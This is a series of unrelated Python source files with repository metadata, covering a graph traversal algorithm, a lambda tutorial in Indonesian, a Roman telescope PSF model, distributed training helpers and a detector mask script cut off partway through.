09bbd0c9e8cc82210df905e7d3c315265914e143
|
refs/heads/master
| 2022-10-05T05:38:10.386032
| 2022-09-26T05:10:10
| 2022-09-26T05:10:10
| 114,614,712
| 290
| 77
|
MIT
| 2022-09-26T06:23:15
| 2017-12-18T08:23:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,878
|
py
|
depth_first_order.py
|
"""
* Execution: python depth_first_order.py digraph.txt
* Data files: https://algs4.cs.princeton.edu/42digraph/tinyDAG.txt
* https://algs4.cs.princeton.edu/42digraph/tinyDG.txt
*
* Compute preorder and postorder for a digraph or edge-weighted digraph.
* Runs in O(E + V) time.
*
* % python depth_first_order.py tinyDAG.txt
* v pre post
* --------------
* 0 0 8
* 1 3 2
* 2 9 10
* 3 10 9
* 4 2 0
* 5 1 1
* 6 4 7
* 7 11 11
* 8 12 12
* 9 5 6
* 10 8 5
* 11 6 4
* 12 7 3
* Preorder: 0 5 4 1 6 9 11 12 10 2 3 7 8
* Postorder: 4 5 1 12 11 10 9 6 0 3 2 7 8
* Reverse postorder: 8 7 2 3 0 6 9 10 11 12 1 5 4
*
"""
from algs4.queue import Queue
from algs4.stack import Stack
from algs4.digraph import Digraph
class DepthFirstOrder:
def __init__(self, G):
self.marked = [False for _ in range(G.V)]
self.pre = Queue()
self.post = Queue()
for w in range(G.V):
if not self.marked[w]:
self.dfs(G, w)
def dfs(self, G, v):
self.pre.enqueue(v)
self.marked[v] = True
for w in G.adj[v]:
if not self.marked[w]:
self.dfs(G, w)
self.post.enqueue(v)
def reverse_post(self):
reverse = Stack()
for v in self.post:
reverse.push(v)
return reverse
if __name__ == '__main__':
import sys
g = Digraph(file=open(sys.argv[1]))
dfs = DepthFirstOrder(g)
print("Preorder: ")
for v in dfs.pre:
print(v, " ", end="")
print()
print("Postorder: ")
for v in dfs.post:
print(v, " ", end="")
print()
print("ReversePostorder: ")
for v in dfs.reverse_post():
print(v, " ", end="")
print()
|
b3a436556bac2b664734968c44e271bbe4667189
|
2883819589b815a96e992cf184a28a9cbafc19d5
|
/Episode 52 - Anonymous atau lambda function/main_app.py
|
4c5bcef6c792092d178ad193195839e034e8eff9
|
[] |
no_license
|
kelasterbuka/Python3.x_Dasar_Programming
|
f944cbfdd990b50ffdb5c0abf68033d5256b5cad
|
0fd9299817ab5804d16d7981707d589b36a962e1
|
refs/heads/master
| 2023-01-08T21:13:39.395752
| 2022-11-02T07:46:40
| 2022-11-02T07:46:40
| 123,400,518
| 453
| 361
| null | 2023-02-02T11:48:48
| 2018-03-01T07:44:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
main_app.py
|
# Lambda function
def f_kuadrat(angka):
return angka**2
print(f"hasil fungsi kuadrat = {f_kuadrat(3)}")
# kita coba dengan lambda
# output = lambda argument: expression
kuadrat = lambda angka : angka**2
print(f"hasil lambda kuadrat = {kuadrat(5)}")
pangkat = lambda num,pow : num**pow
print(f"hasil lambda pangkat = {pangkat(4,2)}")
## kegunaan apa bang?
# sorting untuk list biasa
data_list = ["Otong","Ucup","Dudung"]
data_list.sort()
print(f"sorted list = {data_list}")
# sorting dia pakai panjang
def panjang_nama(nama):
return len(nama)
data_list.sort(key=panjang_nama)
print(f"sorted list by panjang = {data_list}")
# sort pakai lambda
data_list = ["Otong","Ucup","Dudung"]
data_list.sort(key=lambda nama:len(nama))
print(f"sorted list by lambda = {data_list}")
# filter
data_angka = [1,2,3,4,5,6,7,8,9,10,11,12]
def kurang_dari_lima(angka):
return angka < 5
data_angka_baru = list(filter(kurang_dari_lima,data_angka))
data_angka_baru = list(filter(lambda x:x<7,data_angka))
print(data_angka_baru)
# kasus genap
data_genap = list(filter(lambda x:(x%2==0),data_angka))
print(data_genap)
# kasus ganjil
data_ganjil = list(filter(lambda x:(x%2!=0),data_angka))
print(data_ganjil)
# kelipatan 3
data_3 = list(filter(lambda x:(x%3==0),data_angka))
print(data_3)
# anonymous function
# currying <- Haskell Curry
def pangkat(angka,n):
hasil = angka**n
return hasil
data_hasil = pangkat(5,2)
print(f"fungsi biasa = {data_hasil}")
# dengan currying menjadi
def pangkat(n):
return lambda angka:angka**n
pangkat2 = pangkat(2)
print(f"pangkat2 = {pangkat2(5)}")
pangkat3 = pangkat(3)
print(f"pangkat3 = {pangkat3(3)}")
print(f"pangkat bebas = {pangkat(4)(5)}")
|
84e4a17eb33ae97eb4a95edeeed553ec162c5357
|
0010b3d8b8f806d6065e1bb1aa3c18f9714001a7
|
/galsim/roman/roman_psfs.py
|
aea1b67c62b2a6f452dbb0d8181e2a97d18abfdc
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
GalSim-developers/GalSim
|
bfd2d5e57f20874ad81bc735195c5c62efad63eb
|
f1c0319600cc713373f1cea7459171fbf388848e
|
refs/heads/main
| 2023-08-17T07:30:44.583679
| 2023-08-15T02:52:00
| 2023-08-15T02:52:00
| 3,510,804
| 194
| 104
|
NOASSERTION
| 2023-09-12T04:03:38
| 2012-02-22T02:51:45
|
Python
|
UTF-8
|
Python
| false
| false
| 22,669
|
py
|
roman_psfs.py
|
# Copyright (c) 2012-2022 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
import numpy as np
import os
from ..utilities import LRU_Cache
"""
@file roman_psfs.py
Part of the Roman Space Telescope module. This file includes routines needed to define a realistic
PSF for Roman.
"""
# Define a default set of bandpasses for which this routine works.
default_bandpass_list = ['J129', 'F184', 'W149', 'Y106', 'Z087', 'H158']
# Prefix for files containing information about Zernikes for each SCA for cycle 7.
zemax_filepref = "Roman_Phase-A_SRR_WFC_Zernike_and_Field_Data_170727"
zemax_filesuff = '.txt'
zemax_wavelength = 1293. #nm
# These need 'SCA*' prepended to the start to get the file name, and they live in
# the share/roman directory.
pupil_plane_file_longwave = '_full_mask.fits.gz'
pupil_plane_file_shortwave = '_rim_mask.fits.gz'
def getPSF(SCA, bandpass,
SCA_pos=None, pupil_bin=4, wcs=None,
n_waves=None, extra_aberrations=None,
wavelength=None, gsparams=None,
logger=None, high_accuracy=None, approximate_struts=None):
"""Get a single PSF for Roman ST observations.
The user must provide the SCA and bandpass; the latter is used when setting up the pupil
plane configuration and when interpolating chromatic information, if requested.
This routine carries out linear interpolation of the aberrations within a given SCA, based on
the Roman (then WFIRST) Cycle 7 specification of the aberrations as a function of focal plane
position, more specifically from ``Roman_Phase-A_SRR_WFC_Zernike_and_Field_Data_170727.xlsm``
downloaded from https://roman.gsfc.nasa.gov/science/Roman_Reference_Information.html. Phase
B updates that became available in mid-2019 have not yet been incorporated into this module.
(Note: the files at that url still use the old WFIRST name. We have renamed them to use the
new name of the telescope, Roman, after downloading.)
The mask images for the Roman pupil plane are available at the Roman Reference Information
page: https://roman.gsfc.nasa.gov/science/Roman_Reference_Information.html.
There are separate files for each SCA, since the view of the spider pattern varies somewhat
across the field of view of the wide field camera. Furthermore, the effect of the obscuration
is somewhat different at longer wavelengths, so F184 has a different set of files than the
other filters. cf. the ``galsm.roman.longwave_bands`` and ``galsim.roman.shortwave_bands``
attributes, which define which bands use which pupil plane images. Users usually don't need
to worry about any of this, as GalSim will select the correct pupil image automatically based
on the SCA and bandpass provided.
The full pupil plane images are 4096 x 4096, which use a lot of memory and are somewhat slow
to use, so we normally bin them by a factor of 4 (resulting in 1024 x 1024 images). This
provides enough detail for most purposes and is much faster to render than using the full pupil
plane images. This bin factor is a settable parameter, called ``pupil_bin``. If you want the
more accurate, slower calculation using the full images, you can set it to 1. In the other
direction, using pupil_bin=8 (resulting in a 512 x 512 image) still provides fairly reasonable
results and is even faster to render. It is not generally recommended to use higher binning
than that, as the diffraction spikes will become noticeably degraded.
.. note::
This function will cache the aperture calculation, so repeated calls with the same
SCA and bandpass should be much faster after the first call, as the pupil plane will
already be loaded. If you need to clear the cache for memory reasons, you may call::
galsim.roman.roman_psfs._make_aperture.clear()
to recover any memory currently being used for this cache. Of course, subsequent calls to
`getPSF` will need to rebuild the aperture at that point.
The PSF that is returned by default will be oriented with respect to the SCA coordinates,
not world coordinates as is typical in GalSim. The pupil plane has a fixed orientation
with respect to the focal plane, so the PSF rotates with the telescope. To obtain a
PSF in world coordinates, which can be convolved with galaxies (that are normally described
in world coordinates), you may pass in a ``wcs`` parameter to this function. This will
project the PSF into world coordinates according to that WCS before returning it. Otherwise,
the return value is equivalent to using ``wcs=galim.PixelScale(galsim.roman.pixel_scale)``.
The calculation takes advantage of the fact that the diffraction limit and aberrations have a
simple, understood wavelength-dependence. (The Roman project webpage for Cycle 7 does in fact
provide aberrations as a function of wavelength, but the deviation from the expected chromatic
dependence is sub-percent so we neglect it here.) For reference, the script used to parse the
Zernikes given on the webpage and create the files in the GalSim repository can be found in
``devel/external/parse_roman_zernikes_1217.py``. The resulting chromatic object can be used to
draw into any of the Roman bandpasses, though the pupil plane configuration will only be
correct for those bands in the same range (i.e., long- or short-wavelength bands).
For applications that require very high accuracy in the modeling of the PSF, with very limited
aliasing, you may want to lower the folding_threshold in the gsparams. Otherwise very bright
stars will show some reflections in the spider pattern and possibly some boxiness at the
outskirts of the PSF. Using ``gsparams = GSParams(folding_threshold=2.e-3)`` generally
provides good results even for very bright (e.g. mag=10) stars. In these cases, you probably
also want to reduce ``pupil_bin`` somewhat from the default value of 4.
By default, no additional aberrations are included above the basic design. However, users can
provide an optional keyword ``extra_aberrations`` that will be included on top of those that are
part of the design. This should be in the same format as for the ChromaticOpticalPSF class,
with units of waves at the fiducial wavelength, 1293 nm. Currently, only aberrations up to order
22 (Noll convention) are simulated. For Roman, the tolerance for additional
aberrations was a total of 90 nanometers RMS as of mid-2015, distributed largely among coma,
astigmatism, trefoil, and spherical aberrations (NOT defocus). This information might serve as
a guide for reasonable ``extra_aberrations`` inputs. The reference for that number is
an earlier Cycle 5 document:
http://roman.gsfc.nasa.gov/science/sdt_public/wps/references/instrument/README_AFTA_C5_WFC_Zernike_and_Field_Data.pdf
However, the default (non-extra) aberrations are from Cycle 7 material linked earlier in this
docstring.
Jitter and charge diffusion are, by default, not included. Users who wish to include these can
find some guidelines for typical length scales of the Gaussians that can represent these
effects, and convolve the ChromaticOpticalPSF with appropriate achromatic Gaussians.
The PSFs are always defined assuming the user will specify length scales in arcsec.
Users may find they do not have to call `getPSF` for all objects in their simulations; for a
given SCA and position within the SCA, and a given pupil plane configuration and wavelength
information, it should be possible to reuse the PSFs.
Parameters:
SCA: Single value specifying the SCA for which the PSF should be
loaded.
bandpass: Single string specifying the bandpass to use when defining the
pupil plane configuration and/or interpolation of chromatic PSFs.
You may also pass a string 'long' or 'short' for this argument, in
which case, the correct pupil plane configuration will be used for
long- or short-wavelength bands (F184 is long, all else is short).
In this case, no interpolation can be used, since it is defined
using the extent of the chosen bandpass. If ``wavelength`` is given,
then bandpass may be None, which will use the short-wavelength pupil
plane image.
SCA_pos: Single galsim.PositionD indicating the position within the SCA
for which the PSF should be created. If None, the exact center of
the SCA is chosen. [default: None]
pupil_bin: The binning to apply to the pupil plane image. (See discussion above.)
[default: 4]
wcs: The WCS to use to project the PSF into world coordinates.
[default: galsim.PixelScale(galsim.roman.pixel_scale)]
n_waves: Number of wavelengths to use for setting up interpolation of the
chromatic PSF objects, which can lead to much faster image
rendering. If None, then no interpolation is used. Note that
users who want to interpolate can always set up the interpolation
later on even if they do not do so when calling `getPSF`.
[default: None]
extra_aberrations: Array of extra aberrations to include in the PSF model, on top of
those that are part of the Roman design. These should be
provided in units of waves at the fiducial wavelength of 1293 nm,
as an array of length 23 with entries 4 through 22 corresponding
to defocus through the 22nd Zernike in the Noll convention.
[default: None]
wavelength: An option to get an achromatic PSF for a single wavelength, for
users who do not care about chromaticity of the PSF. If None,
then the fully chromatic PSF is returned. Alternatively the user
should supply either (a) a wavelength in nanometers, and they
will get achromatic OpticalPSF objects for that wavelength, or
(b) a bandpass object, in which case they will get achromatic
OpticalPSF objects defined at the effective wavelength of that
bandpass. [default: False]
gsparams: An optional GSParams argument. See the docstring for GSParams
for details. [default: None]
Returns:
A single PSF object (either a ChromaticOpticalPSF or an OpticalPSF depending on the
inputs).
"""
from ..position import PositionD
from ..errors import GalSimValueError, GalSimRangeError
from ..bandpass import Bandpass
from ..wcs import PixelScale
from . import n_pix, n_sca, longwave_bands, shortwave_bands, pixel_scale, pixel_scale_mm
# Deprecated options
if high_accuracy:
if approximate_struts:
from ..deprecated import depr
from ..gsparams import GSParams
depr('high_accuracy=True,approximate_struts=True', 2.3,
'pupil_bin=4, gsparams=galsim.GSParams(folding_threshold=2.e-3)',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
# Set folding_threshold 2.5x smaller than default.
gsparams = GSParams.check(gsparams, folding_threshold=2.e-3)
pupil_bin = 4
else:
from ..deprecated import depr
from ..gsparams import GSParams
depr('high_accuracy=True', 2.3,
'pupil_bin=1, gsparams=galsim.GSParams(folding_threshold=2.e-3)',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
# Set folding_threshold 2.5x smaller than default.
gsparams = GSParams.check(gsparams, folding_threshold=2.e-3)
pupil_bin = 1
elif approximate_struts:
from ..deprecated import depr
from ..gsparams import GSParams
depr('approximate_struts=True', 2.3, 'pupil_bin=8',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
pupil_bin = 8
elif approximate_struts is False or high_accuracy is False:
# If they are explicitly given, rather than default (None), then trigger this.
from ..deprecated import depr
from ..gsparams import GSParams
depr('approximate_struts=False, high_accuracy=False', 2.3, 'pupil_bin=4',
'Note: this is not actually equivalent to the old behavior, but it should '
'be both faster and more accurate than the corresponding PSF in v2.2.')
pupil_bin = 4
if SCA <= 0 or SCA > n_sca:
raise GalSimRangeError("Invalid SCA.", SCA, 1, n_sca)
# SCA_pos: if None, then all should just be center of the SCA.
if SCA_pos is None:
SCA_pos = PositionD(n_pix/2, n_pix/2)
# Parse the bandpasses to see which pupil plane image is needed
pupil_plane_type = None
if bandpass in longwave_bands or bandpass=='long':
pupil_plane_type = 'long'
elif bandpass in shortwave_bands or bandpass=='short':
pupil_plane_type = 'short'
elif bandpass is None and n_waves is None:
pupil_plane_type = 'short'
else:
raise GalSimValueError("Bandpass not a valid Roman bandpass or 'short'/'long'.",
bandpass, default_bandpass_list)
# If bandpass is 'short'/'long', then make sure that interpolation is not called for, since that
# requires an actual bandpass.
if bandpass in ['short','long'] and n_waves is not None:
raise GalSimValueError("Cannot use bandpass='short'/'long' with interpolation.", bandpass)
if not isinstance(wavelength, (Bandpass, float, type(None))):
raise TypeError("wavelength should either be a Bandpass, float, or None.")
# Now call _get_single_PSF().
psf = _get_single_PSF(SCA, bandpass, SCA_pos, pupil_bin,
n_waves, extra_aberrations, wavelength,
pupil_plane_type, gsparams)
# Apply WCS.
# The current version is in arcsec units, but oriented parallel to the image coordinates.
# So to apply the right WCS, project to pixels using the Roman mean pixel_scale, then
# project back to world coordinates with the provided wcs.
if wcs is not None:
scale = PixelScale(pixel_scale)
psf = wcs.toWorld(scale.toImage(psf), image_pos=SCA_pos)
return psf
def __make_aperture(SCA, pupil_plane_type, pupil_bin, wave, gsparams):
from . import diameter, obscuration
from .. import fits
from .. import meta_data
from ..phase_psf import Aperture
# Load the pupil plane image.
if pupil_plane_type == 'long':
pupil_plane_im = os.path.join(meta_data.share_dir, 'roman',
'SCA%d'%SCA + pupil_plane_file_longwave)
else:
pupil_plane_im = os.path.join(meta_data.share_dir, 'roman',
'SCA%d'%SCA + pupil_plane_file_shortwave)
pupil_plane_im = fits.read(pupil_plane_im, read_header=True)
# Native pixel scale in the file is for the exit pupil. We want the scale of the
# entrance pupil. Fortunately, they provide the conversion as PUPILMAG in the header.
# They also use microns for units, and we want meters, hence the extra 1.e-6.
pupil_plane_im.scale *= pupil_plane_im.header['PUPILMAG'] * 1.e-6
pupil_plane_im = pupil_plane_im.bin(pupil_bin,pupil_bin)
aper = Aperture(lam=wave, diam=diameter,
obscuration=obscuration,
pupil_plane_im=pupil_plane_im,
gsparams=gsparams)
return aper
# Usually a given run will only need one or a few different apertures for repeated getPSF calls.
# So cache those apertures here to avoid having to remake them.
_make_aperture = LRU_Cache(__make_aperture)
def _get_single_PSF(SCA, bandpass, SCA_pos, pupil_bin,
n_waves, extra_aberrations, wavelength,
pupil_plane_type, gsparams):
"""Routine for making a single PSF. This gets called by `getPSF` after it parses all the
options that were passed in. Users will not directly interact with this routine.
"""
from .. import OpticalPSF, ChromaticOpticalPSF
from . import diameter
from ..bandpass import Bandpass
from .roman_bandpass import getBandpasses
if wavelength is None:
wave = zemax_wavelength
elif isinstance(wavelength, Bandpass):
wave = wavelength = wavelength.effective_wavelength
else:
wave = wavelength
# All parameters relevant to the aperture. We may be able to use a cached version.
aper = _make_aperture(SCA, pupil_plane_type, pupil_bin, wave, gsparams)
# Start reading in the aberrations for that SCA
aberrations, x_pos, y_pos = _read_aberrations(SCA)
# Do bilinear interpolation, unless we're exactly at the center (default).
use_aberrations = _interp_aberrations_bilinear(aberrations, x_pos, y_pos, SCA_pos)
if extra_aberrations is not None:
use_aberrations[:len(extra_aberrations)] += extra_aberrations
# We don't want to use piston, tip, or tilt aberrations. The former doesn't affect the
# appearance of the PSF, and the latter cause centroid shifts. So, we set the first 4
# numbers (corresponding to a place-holder, piston, tip, and tilt) to zero.
use_aberrations[0:4] = 0.
# Now set up the PSF, including the option to interpolate over waves
if wavelength is None:
PSF = ChromaticOpticalPSF(lam=zemax_wavelength,
diam=diameter, aberrations=use_aberrations,
aper=aper, gsparams=gsparams)
if n_waves is not None:
# To decide the range of wavelengths to use, check the bandpass.
bp_dict = getBandpasses()
bp = bp_dict[bandpass]
PSF = PSF.interpolate(waves=np.linspace(bp.blue_limit, bp.red_limit, n_waves),
oversample_fac=1.5)
else:
tmp_aberrations = use_aberrations * zemax_wavelength / wavelength
PSF = OpticalPSF(lam=wavelength, diam=diameter,
aberrations=tmp_aberrations,
aper=aper, gsparams=gsparams)
return PSF
def _read_aberrations(SCA):
"""
This is a helper routine that reads in aberrations for a particular SCA and wavelength (given as
galsim.roman.roman_psfs.zemax_wavelength) from stored files, and returns them along with the
field positions.
Parameters:
SCA: The identifier for the SCA, from 1-18.
Returns:
NumPy arrays containing the aberrations, and x and y field positions.
"""
from .. import meta_data
from . import pixel_scale, n_pix, pixel_scale_mm
# Construct filename.
sca_str = '_%02d'%SCA
infile = os.path.join(meta_data.share_dir, 'roman',
zemax_filepref + sca_str + zemax_filesuff)
# Read in data.
dat = np.loadtxt(infile)
# It actually has 5 field positions, not just 1, to allow us to make position-dependent PSFs
# within an SCA eventually. Put it in the required format: an array of length (5 field
# positions, 23 Zernikes), with the first entry empty (Zernike polynomials are 1-indexed so we
# use entries 1-22). The units are waves.
aberrations = np.zeros((5,23))
aberrations[:,1:] = dat[:,5:]
# Also get the field position. The file gives it in mm with respect to the center, but we
# want it in pixels with respect to the corner. The pixel size of the detector is 0.01 mm/pixel
# The y-coordinates have the opposite signs to the corresponding WFI location, explained
# in the Roman file.
x_sca_pos = dat[:,1]/pixel_scale_mm + n_pix/2
y_sca_pos = n_pix/2 - dat[:,2]/pixel_scale_mm
return aberrations, x_sca_pos, y_sca_pos
def _interp_aberrations_bilinear(aberrations, x_pos, y_pos, SCA_pos):
"""
This is a helper routine to do bilinear interpolation of aberrations defined at 4 field
positions: the four corners. Note that we also have aberrations at the center position,
but these are generally quite close (within a few percent) of what would come from this bilinear
interpolation. So for simplicity, we just do the bilinear interpolation.
"""
min_x = np.min(x_pos)
min_y = np.min(y_pos)
max_x = np.max(x_pos)
max_y = np.max(y_pos)
x_frac = (SCA_pos.x - min_x) / (max_x - min_x)
y_frac = (SCA_pos.y - min_y) / (max_y - min_y)
lower_x_lower_y_ab = aberrations[(x_pos==min_x) & (y_pos==min_y), :]
lower_x_upper_y_ab = aberrations[(x_pos==min_x) & (y_pos==max_y), :]
upper_x_lower_y_ab = aberrations[(x_pos==max_x) & (y_pos==min_y), :]
upper_x_upper_y_ab = aberrations[(x_pos==max_x) & (y_pos==max_y), :]
interp_ab = (1.0-x_frac)*(1.0-y_frac)*lower_x_lower_y_ab + \
(1.0-x_frac)*y_frac*lower_x_upper_y_ab + \
x_frac*(1.0-y_frac)*upper_x_lower_y_ab + \
x_frac*y_frac*upper_x_upper_y_ab
return interp_ab.flatten()
|
650ed335c405298b82c01ae6ab60fc9f8f118a39
|
f132958875a962ee925e19fbb3f1266ba6a6e6cb
|
/demucs/distrib.py
|
dc1576cb49693df491d58c8813d5ebac6c8ff749
|
[
"MIT"
] |
permissive
|
facebookresearch/demucs
|
9fc8422f02b79c4d50500a9a02676e707809adb0
|
0cb4a90dbeb36b9495b505ad1ec90ac91feb7bc4
|
refs/heads/main
| 2023-08-21T19:07:44.858104
| 2023-08-02T21:21:52
| 2023-08-02T21:21:52
| 217,436,984
| 6,636
| 902
|
MIT
| 2023-08-25T08:44:09
| 2019-10-25T02:43:20
|
Python
|
UTF-8
|
Python
| false
| false
| 3,237
|
py
|
distrib.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Distributed training utilities.
"""
import logging
import pickle
import numpy as np
import torch
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data import DataLoader, Subset
from torch.nn.parallel.distributed import DistributedDataParallel
from dora import distrib as dora_distrib
logger = logging.getLogger(__name__)
rank = 0
world_size = 1
def init():
global rank, world_size
if not torch.distributed.is_initialized():
dora_distrib.init()
rank = dora_distrib.rank()
world_size = dora_distrib.world_size()
def average(metrics, count=1.):
if isinstance(metrics, dict):
keys, values = zip(*sorted(metrics.items()))
values = average(values, count)
return dict(zip(keys, values))
if world_size == 1:
return metrics
tensor = torch.tensor(list(metrics) + [1], device='cuda', dtype=torch.float32)
tensor *= count
torch.distributed.all_reduce(tensor, op=torch.distributed.ReduceOp.SUM)
return (tensor[:-1] / tensor[-1]).cpu().numpy().tolist()
def wrap(model):
if world_size == 1:
return model
else:
return DistributedDataParallel(
model,
# find_unused_parameters=True,
device_ids=[torch.cuda.current_device()],
output_device=torch.cuda.current_device())
def barrier():
if world_size > 1:
torch.distributed.barrier()
def share(obj=None, src=0):
if world_size == 1:
return obj
size = torch.empty(1, device='cuda', dtype=torch.long)
if rank == src:
dump = pickle.dumps(obj)
size[0] = len(dump)
torch.distributed.broadcast(size, src=src)
# size variable is now set to the length of pickled obj in all processes
if rank == src:
buffer = torch.from_numpy(np.frombuffer(dump, dtype=np.uint8).copy()).cuda()
else:
buffer = torch.empty(size[0].item(), device='cuda', dtype=torch.uint8)
torch.distributed.broadcast(buffer, src=src)
# buffer variable is now set to pickled obj in all processes
if rank != src:
obj = pickle.loads(buffer.cpu().numpy().tobytes())
logger.debug(f"Shared object of size {len(buffer)}")
return obj
def loader(dataset, *args, shuffle=False, klass=DataLoader, **kwargs):
"""
Create a dataloader properly in case of distributed training.
If a gradient is going to be computed you must set `shuffle=True`.
"""
if world_size == 1:
return klass(dataset, *args, shuffle=shuffle, **kwargs)
if shuffle:
# train means we will compute backward, we use DistributedSampler
sampler = DistributedSampler(dataset)
# We ignore shuffle, DistributedSampler already shuffles
return klass(dataset, *args, **kwargs, sampler=sampler)
else:
# We make a manual shard, as DistributedSampler otherwise replicate some examples
dataset = Subset(dataset, list(range(rank, len(dataset), world_size)))
return klass(dataset, *args, shuffle=shuffle, **kwargs)
|
c7953fefd02e9f7016bba4c7d22b69d931794a5a
|
5b6ba0f288b1e2ac236af846a9bf546a63228476
|
/xfel/command_line/make_mask.py
|
278a4ac866383bc5ac5952e28c0182536e7a8a8b
|
[
"BSD-3-Clause-LBNL"
] |
permissive
|
cctbx/cctbx_project
|
5b547b416cadbdf95cca21dace9f54272a08d98a
|
7f4dfb6c873fd560920f697cbfd8a5ff6eed82fa
|
refs/heads/master
| 2023-08-17T17:44:05.077010
| 2023-08-16T22:40:22
| 2023-08-16T22:40:22
| 39,508,026
| 206
| 131
|
NOASSERTION
| 2023-09-14T17:12:55
| 2015-07-22T13:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 10,561
|
py
|
make_mask.py
|
from __future__ import absolute_import, division, print_function
from six.moves import range
# -*- mode: python; coding: utf-8; indent-tabs-mode: nil; python-indent: 2 -*-
#
# LIBTBX_SET_DISPATCHER_NAME cxi.make_mask
#
# $Id: make_mask.py 411 2013-10-16 22:17:45Z aaron $
#
# This code reads three cctbx.xfel pickle format images and builds a mask from
# them. The first image should be an average from a dark run, the second the
# standard deviation from that run. The third image should be a maximum projection
# from a run with the beam on.
#
# The result is an image with all pixels which are valid for use set to 0, and
# those that are invalid set to -2 by default, or the value of the option passed in
# to mask_pix_val.
#
import dxtbx.format.Registry
from xfel.cxi.cspad_ana.cspad_tbx import dpack, dwritef2
from scitbx.array_family import flex
import sys
def point_in_polygon(point, poly):
""" Determine if a point is inside a given polygon or not. Polygon is a list of (x,y) pairs.
Code adapted from a dials polygon clipping test algorithm"""
if len(poly) < 3: return False
inside = False
for i in range(len(poly)):
j = (i+1) % len(poly)
if (((poly[i][1] > point[1]) != (poly[j][1] > point[1])) and
(point[0] < (poly[j][0] - poly[i][0]) * (point[1] - poly[i][1]) /
(poly[j][1] - poly[i][1]) + poly[i][0])):
inside = not inside
return inside
def point_inside_circle(x,y,center_x,center_y,radius):
"""Determine if a given point (x,y) is inside a circle whose center is at
(center_x,center_y) with radius x."""
return (x-center_x)**2 + (y - center_y)**2 < radius**2
def run(argv=None):
import libtbx.option_parser
if (argv is None):
argv = sys.argv
command_line = (libtbx.option_parser.option_parser(
usage="%s [-v] [-p poly_mask] [-c circle_mask] [-a avg_max] [-s stddev_max] [-m maxproj_min] [-x mask_pix_val] [-o output] avg_path stddev_path max_path" % libtbx.env.dispatcher_name)
.option(None, "--verbose", "-v",
action="store_true",
default=False,
dest="verbose",
help="Print more information about progress")
.option(None, "--poly_mask", "-p",
type="string",
default=None,
dest="poly_mask",
help="Polygon to mask out. Comma-seperated string of xy pairs.")
.option(None, "--circle_mask", "-c",
type="string",
default=None,
dest="circle_mask",
help="Circle to mask out. Comma-seperated string of x, y, and radius.")
.option(None, "--avg_max", "-a",
type="float",
default=2000.0,
dest="avg_max",
help="Maximum ADU that pixels in the average image are allowed to have before masked out")
.option(None, "--stddev_max", "-s",
type="float",
default=10.0,
dest="stddev_max",
help="Maximum ADU that pixels in the standard deviation image are allowed to have before masked out")
.option(None, "--maxproj_min", "-m",
type="float",
default=300.0,
dest="maxproj_min",
help="Minimum ADU that pixels in the maximum projection image are allowed to have before masked out")
.option(None, "--mask_pix_val", "-x",
type="int",
default=-2,
dest="mask_pix_val",
help="Value for masked out pixels")
.option(None, "--detector_format_version", "-d",
type="string",
default=None,
dest="detector_format_version",
help="detector format version string")
.option(None, "--output", "-o",
type="string",
default="mask_.pickle",
dest="destpath",
help="output file path, should be *.pickle")
).process(args=argv[1:])
# Must have exactly three remaining arguments.
paths = command_line.args
if (len(paths) != 3):
command_line.parser.print_usage(file=sys.stderr)
return
if command_line.options.detector_format_version is None:
address = timestamp = None
else:
from xfel.cxi.cspad_ana.cspad_tbx import evt_timestamp
from iotbx.detectors.cspad_detector_formats import address_and_timestamp_from_detector_format_version
address, timestamp = address_and_timestamp_from_detector_format_version(command_line.options.detector_format_version)
timestamp = evt_timestamp((timestamp,0))
poly_mask = None
if not command_line.options.poly_mask == None:
poly_mask = []
poly_mask_tmp = command_line.options.poly_mask.split(",")
if len(poly_mask_tmp) % 2 != 0:
command_line.parser.print_usage(file=sys.stderr)
return
odd = True
for item in poly_mask_tmp:
try:
if odd:
poly_mask.append(int(item))
else:
poly_mask[-1] = (poly_mask[-1],int(item))
except ValueError:
command_line.parser.print_usage(file=sys.stderr)
return
odd = not odd
circle_mask = None
if command_line.options.circle_mask is not None:
circle_mask_tmp = command_line.options.circle_mask.split(",")
if len(circle_mask_tmp) != 3:
command_line.parser.print_usage(file=sys.stderr)
return
try:
circle_mask = (int(circle_mask_tmp[0]),int(circle_mask_tmp[1]),int(circle_mask_tmp[2]))
except ValueError:
command_line.parser.print_usage(file=sys.stderr)
return
avg_path = paths[0]
stddev_path = paths[1]
max_path = paths[2]
# load the three images
format_class = dxtbx.format.Registry.get_format_class_for_file(avg_path)
avg_f = format_class(avg_path)
avg_i = avg_f.get_detectorbase()
avg_d = avg_i.get_raw_data()
stddev_f = format_class(stddev_path)
stddev_i = stddev_f.get_detectorbase()
stddev_d = stddev_i.get_raw_data()
max_f = format_class(max_path)
max_i = max_f.get_detectorbase()
max_d = max_i.get_raw_data()
# first find all the pixels in the average that are less than zero or greater
# than a cutoff and set them to the masking value
avg_d.set_selected((avg_d <= 0) | (avg_d > command_line.options.avg_max), command_line.options.mask_pix_val)
# set all the rest of the pixels to zero. They will be accepted
avg_d.set_selected(avg_d != command_line.options.mask_pix_val, 0)
# mask out the overly noisy or flat pixels
avg_d.set_selected(stddev_d <= 0, command_line.options.mask_pix_val)
avg_d.set_selected(stddev_d >= command_line.options.stddev_max, command_line.options.mask_pix_val)
# these are the non-bonded pixels
avg_d.set_selected(max_d < command_line.options.maxproj_min, command_line.options.mask_pix_val)
# calculate the beam center
panel = avg_f.get_detector()[0]
